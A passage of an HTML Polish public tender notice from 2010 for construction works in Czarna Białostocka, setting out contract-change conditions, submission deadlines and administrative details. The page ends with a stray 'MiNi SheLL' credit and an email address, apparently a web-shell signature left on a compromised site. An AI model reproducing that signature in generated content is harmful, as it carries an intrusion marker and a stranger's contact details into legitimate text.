 wystąpienia innych okoliczności niezależnych od wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
 nie przekazania wykonawcy przez zamawiającego w terminie terenu budowy lub dokumentów budowy, do których przekazania zamawiający był zobowiązany,
 wstrzymania przez zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie wykonawcy (nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę),
 konieczności wykonania przez zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji,
w przypadku zmiany terminu realizacji przedmiotu umowy, z wyżej wymienionych przyczyn, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności;
b)	w zakresie skrócenia terminu realizacji zamówienia w przypadku stwierdzenia przez wykonawcę możliwości wcześniejszego wykonania przedmiotu umowy;
c)	zamawiający nie ma obowiązku przedłużenia terminu wykonania robót, jeżeli wykonawca w terminie 7 dni od wystąpienia okoliczności, o których mowa w ust. 2 lit. a), nie złoży zamawiającemu, na piśmie, uzasadnionego wniosku o przedłużenie terminu wykonania przedmiotu umowy i  nie uzyska  akceptacji tego wniosku;
d)	rozszerzenie odpowiedzialności z tytułu rękojmi lub przedłużenia terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2010 godzina 11:00, miejsce: Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com